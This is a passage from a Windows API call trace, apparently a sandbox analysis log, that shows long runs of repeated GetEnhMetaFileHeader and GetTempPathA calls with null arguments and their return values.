lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.860] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.860] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, 
lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.860] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.860] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.860] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.860] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.860] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.861] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.861] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.861] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.861] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.861] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.861] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.861] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.861] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.861] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.861] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) 
returned 0x0 [0107.861] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.861] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.861] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.861] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.861] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.861] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.861] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.861] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.861] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.861] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.861] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.861] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.861] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.861] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.861] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.861] GetEnhMetaFileHeader (in: hemf=0x0, 
nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.861] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.861] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.861] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.861] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.861] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.861] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.861] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.861] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.861] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.861] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.861] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.861] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.861] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.861] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.861] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: 
lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.861] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.861] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.861] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.861] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.861] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.861] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.862] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.862] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.881] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.881] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.881] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.882] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.882] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.882] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.882] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.882] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.882] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.882] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | 
out: lpBuffer=0x0) returned 0x25 [0107.882] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.882] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.882] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.882] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.882] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.882] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.882] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.882] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.882] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.882] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.882] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.882] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.882] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.882] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.882] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.882] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.882] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.882] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.882] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.882] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.882] GetTempPathA (in: 
nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.882] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.882] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.882] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.882] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.882] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.882] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.882] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.882] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.883] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.883] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.883] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.883] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.883] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.883] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.883] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.883] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.883] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.883] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.883] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.883] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.883] 
GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.883] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.883] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.883] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.883] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.883] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.883] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.883] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.883] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.883] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.883] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.883] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.883] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.883] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.883] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.883] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.883] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.883] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.883] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.883] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.883] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 
0x25 [0107.884] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.884] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.884] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.884] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.884] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.884] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.884] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.884] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.884] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.884] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.884] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.884] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.884] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.884] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.884] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.884] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.884] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.884] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.884] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.884] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.884] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: 
lpBuffer=0x0) returned 0x25 [0107.884] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.884] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.884] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.884] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.884] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.884] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.884] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.884] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.884] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.884] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.884] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.884] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.884] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.884] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.885] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.885] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.885] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.885] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.885] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.885] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.885] GetTempPathA (in: nBufferLength=0x0, 
lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.885] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.885] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.885] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.885] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.885] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.885] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.885] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.885] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.885] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.885] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.885] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.885] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.885] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.885] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.885] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.885] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.885] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.885] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.885] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.885] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.885] GetTempPathA (in: 
nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.885] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.885] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.885] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.885] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.885] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.885] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.886] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.886] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.886] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.886] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.886] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.886] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.886] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.886] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.886] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.886] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.886] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.886] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.886] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.886] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.886] 
GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.886] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.886] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.886] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.886] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.886] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.886] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.886] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.886] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.886] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.886] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.886] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.886] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.887] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.887] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.887] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.887] GetTempPathA (in: 